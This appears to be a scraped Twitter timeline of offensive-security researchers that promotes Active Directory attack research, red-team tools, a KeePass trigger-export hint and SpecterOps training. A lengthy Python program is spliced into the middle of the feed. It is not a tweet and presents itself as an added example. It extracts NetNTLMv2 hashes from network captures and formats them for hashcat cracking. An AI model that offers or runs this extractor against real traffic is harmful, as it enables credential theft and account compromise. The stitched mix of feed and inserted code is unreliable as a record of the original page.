5 months ago and I started looking into the security of Active Directory Certificate Services. Today we're releasing the results of that research: a blog post (posts.specterops.io/certified-pre-) plus a 140-page whitepaper and a defensive audit tool (links at the top of the post) [1/6]
Will Schroeder
@harmj0y
Will Schroeder’s Tweets
#FF Charlie Bromberg.
● Charlie has been consistently putting out high-quality signal for several years.
● You can find a lot of it at his site, thehacker.recipes
● He's made HUGE contributions to FOSS projects, including #BloodHound.
Give him a follow!
✅ I nominated and for their awesome contributions and guidance in the past months and years. I wish I could nominate other awesome contributors like and more, but I was limited to 3.
New technique to dump NTDS remotely WITHOUT DRSUAPI: github.com/zblurx/certsync (Golden Certificates + UnPAC the hash automation)
Thanks for certipy, which my script heavily relies on.
Have you ever wondered how RODCs work and whether compromising one would necessarily allow for privilege escalation?
The answers are in my new post:
At the Edge of Tier Zero: The Curious Case of the RODC
Of course it's disputed... 😅 #keepass
Do not forget policies... enforced ones!
> keepass.info/help/kb/config
"Disable trigger system" / "Disable trigger system, delete user triggers" + <ExportNoKey>false</ExportNoKey>
This looks like an incredible piece of work, can't wait to try it out!
Quote Tweet
I’m pleased to release Inline-Execute-PE, a CobaltStrike toolkit enabling users to load and repeatedly run unmanaged Windows EXEs in Beacon memory without dropping to disk or creating a new process each time. github.com/Octoberfest7/I
#redteam #cybersecurity #malware
A great overview of what Windows Services are, how they work, and what weaknesses or abilities they can provide attackers
Today and I are releasing the 2nd installment of The Defender's Guide! In this blog we walk through Windows Services!
Medium Link: posts.specterops.io/the-defenders-
Github Link: github.com/Defenders-Guid
SCCM takeover by abusing automatic client push installation has less requirements than I thought. Check this post out for a detailed walkthrough and recommendations. Install KB15599094 and disable NTLM for client push installation to prevent this attack.
If no events were generated it's a blindspot.
If there were events and no alerts then it's a lack of coverage of that specific technique(s).
If there were detections claiming to detect said technique(s) and no alert was triggered then it's an evasion
Elastic Agent's memory scanning feature is cool.
Updated the DACL abuse mindmap. New dark theme, used BloodHound's iconography, added the ACE inheritance path for Containers and Organizational Unit.
🧑🍳 The Hacker Recipes thehacker.recipes/ad/movement/da
The year is winding down! SpecterOps is closing for the next two weeks, but you can still register for our March training courses if you still have some last-second holiday shopping to do. ghst.ly/march2023
Happy Holidays from all of us here at SpecterOps! Our offices are closed December 26th-January 9th to allow our team to relax and spend some extended time with their loved ones (and their presents!) We look forward to what's to come in 2023.
ICYMI: dropped a new blog post today: Passwordless Persistence and Privilege Escalation in Azure
You can read it here:
There is now a BloodHound Enterprise app on splunkbase!
splunkbase.splunk.com/app/6609
#BloodHound #Splunk
Welcome to the new AD Mindmap upgrade!
v2022_11 will be dark only (it is too painful to maintain two versions).
Thx again to and for their help 👍
Full quality and zoomable version here:
orange-cyberdefense.github.io/ocd-mindmaps/i
Overview:
[RELEASE] After a little wait, I'm happy to present SilentMoonwalk, a PoC implementation of a TRUE call stack spoofer, the result of joint research on an original technique developed by namazso, done with my friends and .
Enjoy! ;)
Attending #BHEU this week? So are we! Come by Booth 506 to find out more about our services, trainings, and #BloodHoundEnterprise.
I wrote a blog post that talks about how we can abuse yet another Chrome Remote Debugging feature to "stalk" end users.
Tickets are on sale for our Adversary Tactics: Red Team Operations, Detection, and Tradecraft Analysis courses taking place virtually March 7 - 10, 2023. Register today! ghst.ly/march2023
🧵 (1/x) I know you love #pentest stories, so here’s one of those ⬇️
There’s a non-DC computer (Victim) that is a member of the Exchange Trusted Subsystem group and has DCSync privs. The WebClient is ON but the MAQ=0 and domain functional level is 2012 R2 which prevents us ⤵️
I plan on seeing how Twitter fares but I'm excited to see how infosec.exchange evolves! Infosec has been my main use for Twitter over the last decade, so I want to make sure I interact with my community where it makes the most sense
As promised, the code for and my POC (WonkaVision). Just to reiterate, this isn't intended to be a production-ready enterprise application, but to generate ideas on forged ticket detections and publicize discovered IOAs:
I've always thought that in order for Defenders to be truly effective, it is vital they know where the telemetry they are leveraging is coming from.
Today I am releasing a project called TelemetrySource that is meant to support that cause.
Blog:
1) We are finally propagating MotW to Virtual Disk containers! For example, when you download and mount an ISO from the Internet, applications that query the zone of files inside of that ISO will receive the zone of the ISO itself. 3/7
The latest episode of The Hacker Factory Podcast just dropped featuring 's very own Justin Kohler! An Podcast #podcast
SpecterOps observes Election day as a company holiday. We are closed today to allow our employees every opportunity to cast their ballots.
"Voting is not only our right - it is our power." -Loung Ung
and I have started a blog post series providing a defensive knowledge base for commonly attacked technologies. We started with the Windows Registry, which was released today; check it out over at Medium!
I made a crappy C# tool to extract NetNTLMv2 hashes from .etl captures (e.g. using the PktMon native driver). Idea adapted from NTLMRawUnHide ()
github.com/X-C3LL/SharpNT
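The idea behind the tool above, shown as an added Python example rather than the tweet's C# (this is not X-C3LL's SharpNTLM and not NTLMRawUnHide, just the same approach re-implemented): scan a raw byte buffer for the "NTLMSSP\0" signature, read the ServerChallenge out of each type 2 message, read user, domain and NtChallengeResponse out of each type 3 message, and emit hashcat -m 5600 lines. It assumes the capture has already been reduced to raw bytes (for instance by converting the PktMon .etl to pcap and pulling out the payloads); ETL parsing itself is not shown. The sample capture is constructed inline with made-up values.

```python
import re
import struct

# Added example, not SharpNTLM's code. Offsets follow the MS-NLMP message layouts.
NTLMSSP_SIG = b"NTLMSSP\x00"
NTLMSSP_NEGOTIATE_UNICODE = 0x00000001


def _read_field(msg: bytes, off: int) -> bytes:
    """Resolve an NTLMSSP (Len, MaxLen, BufferOffset) descriptor to its payload bytes."""
    length, _max_len, offset = struct.unpack_from("<HHI", msg, off)
    return msg[offset:offset + length]


def parse_challenge(msg: bytes) -> bytes:
    """Return the 8-byte ServerChallenge of a CHALLENGE_MESSAGE (type 2)."""
    return msg[24:32]


def parse_authenticate(msg: bytes) -> dict:
    """Pull domain, user and NtChallengeResponse out of an AUTHENTICATE_MESSAGE (type 3)."""
    flags = struct.unpack_from("<I", msg, 60)[0]
    # Strings are UTF-16LE when NEGOTIATE_UNICODE is set; otherwise OEM (approximated as latin-1)
    enc = "utf-16-le" if flags & NTLMSSP_NEGOTIATE_UNICODE else "latin-1"
    return {
        "domain": _read_field(msg, 28).decode(enc),
        "user": _read_field(msg, 36).decode(enc),
        "nt_response": _read_field(msg, 20),
    }


def extract_netntlmv2(capture: bytes) -> list:
    """Find NTLMSSP messages in a raw byte blob, pair each type 3 with the preceding
    type 2, and return hashcat -m 5600 lines (user::domain:challenge:NTProofStr:blob).
    Pairing by order is enough for a single stream; on a busy capture pair within one
    TCP/SMB conversation instead, or the challenge may belong to another session."""
    lines = []
    challenge = None
    for m in re.finditer(re.escape(NTLMSSP_SIG), capture):
        msg = capture[m.start():]            # field offsets are relative to the signature
        if len(msg) < 12:
            continue
        msg_type = struct.unpack_from("<I", msg, 8)[0]
        if msg_type == 2 and len(msg) >= 32:
            challenge = parse_challenge(msg)
        elif msg_type == 3 and challenge is not None and len(msg) >= 64:
            auth = parse_authenticate(msg)
            nt = auth["nt_response"]
            if len(nt) <= 24:                 # 24 bytes = NTLMv1 or anonymous, not a v2 response
                continue
            lines.append(
                f"{auth['user']}::{auth['domain']}:{challenge.hex()}:"
                f"{nt[:16].hex()}:{nt[16:].hex()}"   # NTProofStr, then the NTLMv2 client blob
            )
            challenge = None
    return lines


def _field(payload: bytes, offset: int) -> bytes:
    return struct.pack("<HHI", len(payload), len(payload), offset)


def build_sample_capture() -> bytes:
    """Constructed sample input (made-up values, not a real capture): filler bytes around
    one type 2 and one type 3 message, laid out per MS-NLMP offsets."""
    challenge = bytes.fromhex("0123456789abcdef")
    # CHALLENGE_MESSAGE: sig, type, TargetName, flags, ServerChallenge, Reserved, TargetInfo, Version
    type2 = (NTLMSSP_SIG + struct.pack("<I", 2) + _field(b"", 56)
             + struct.pack("<I", NTLMSSP_NEGOTIATE_UNICODE) + challenge + b"\x00" * 8
             + _field(b"", 56) + b"\x00" * 8)
    domain, user = "CORP".encode("utf-16-le"), "alice".encode("utf-16-le")
    lm_resp = b"\x00" * 24
    nt_resp = bytes.fromhex("11" * 16) + bytes.fromhex("0101000000000000") + b"\x22" * 24
    fields, off = [], 88                      # payload starts after the 16-byte MIC
    for blob in (lm_resp, nt_resp, domain, user, b"", b""):
        fields.append(_field(blob, off))
        off += len(blob)
    # AUTHENTICATE_MESSAGE: sig, type, six field descriptors, flags, Version, MIC, payload
    type3 = (NTLMSSP_SIG + struct.pack("<I", 3) + b"".join(fields)
             + struct.pack("<I", NTLMSSP_NEGOTIATE_UNICODE) + b"\x00" * 8 + b"\x00" * 16
             + lm_resp + nt_resp + domain + user)
    return b"\x00" * 7 + b"junk" + type2 + b"\xff" * 5 + type3 + b"tail"


if __name__ == "__main__":
    for line in extract_netntlmv2(build_sample_capture()):
        print(line)
```

Feed the resulting lines straight to hashcat -m 5600. The signature scan is deliberately format-agnostic, which is what makes it work on whatever the .etl was converted to, but it also means the only session binding is message order; the caveat in the docstring is the one to keep in mind before trusting a hash from a multi-client capture.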
The video for my talk is now up! In this talk:
1. What problems we are solving
2. Attacking Azure with graphs
3. Defending Azure with graphs
With plenty of demos. Check it out here: